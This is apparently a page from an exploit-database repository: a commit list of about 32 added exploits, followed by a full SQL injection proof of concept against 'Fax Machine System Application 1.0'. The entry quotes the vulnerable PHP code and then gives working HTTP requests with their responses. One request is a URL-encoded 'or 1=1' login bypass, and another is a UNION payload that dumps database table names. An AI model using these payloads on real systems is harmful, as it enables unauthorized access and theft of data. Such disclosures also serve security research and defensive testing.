518c704a2f
32 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Hootoo HT-05 - Remote Code Execution (Metasploit) Across DR-810 ROM-0 - Backup File Disclosure i-doit CMDB 1.12 - Arbitrary File Download i-doit CMDB 1.12 - SQL Injection Horde Imp - 'imap_open' Remote Command Execution Modern POS 1.3 - Arbitrary File Download Modern POS 1.3 - SQL Injection Twilio WEB To Fax Machine System Application 1.0 - SQL Injection Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin) Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection Find a Place CMS Directory 1.5 - SQL Injection Cleanto 5.0 - SQL Injection Lenovo R2105 - Cross-Site Request Forgery (Command Execution) HealthNode Hospital Management System 1.0 - SQL Injection Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account) ThinkPHP 5.X - Remote Command Execution Real Estate Custom Script 2.0 - SQL Injection Job Portal Platform 1.0 - SQL Injection Umbraco CMS 7.12.4 - Authenticated Remote Code Execution Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection AudioCode 400HD - Command Injection
84 lines
No EOL
3 KiB
Text
84 lines
No EOL
3 KiB
Text
# Exploit Title: Fax Machine System Application 1.0 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2019-01-13
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: http://ranksol.com/
|
|
# Software Link: https://codecanyon.net/item/twilio-web-to-fax-machine-system-application-php-script/22139608
|
|
# Version: 1.0
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# 1)
|
|
# http://localhost/[PATH]/login_check.php
|
|
#
|
|
|
|
#07 header("Location:login.php");
|
|
#08 }else{
|
|
#09 $email = $_POST['email'];
|
|
#10 $password = $_POST['password'];
|
|
#11 $sql = "SELECT * FROM user WHERE email = '$email' AND password = '$password'";
|
|
#12 $result = $conn->query($sql);
|
|
#13 $counts = mysqli_num_rows($result);
|
|
#14 if($counts > 0){
|
|
|
|
POST /[PATH]/login_check.php HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 75
|
|
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
email=1&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&submit=Login: undefined
|
|
HTTP/1.1 302 Found
|
|
Date: Sun, 13 Jan 2019 13:24:24 GMT
|
|
Server: Apache
|
|
X-Powered-By: PHP/7.1.25
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Location: dashboard.php
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Transfer-Encoding: chunked
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
# POC:
|
|
# 2)
|
|
# http://localhost/[PATH]/add_email.php?id=[SQL]
|
|
#
|
|
|
|
#46 $sel = "select `id`, `number` from subscribers where id = '".$_REQUEST['id']."'";
|
|
#47 $exe = @mysqli_query($conn,$sel);
|
|
#48 $row = @mysqli_fetch_assoc($exe);
|
|
#49 $subscriber_number = $row['number'];
|
|
|
|
GET /[PATH]/add_email.php?id=-34%27%20union%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--%20- HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Upgrade-Insecure-Requests: 1
|
|
HTTP/1.1 200 OK
|
|
Date: Sun, 13 Jan 2019 13:34:31 GMT
|
|
Server: Apache
|
|
X-Powered-By: PHP/7.1.25
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate
|
|
Pragma: no-cache
|
|
Vary: Accept-Encoding
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Transfer-Encoding: chunked
|
|
Content-Type: text/html; charset=UTF-8 |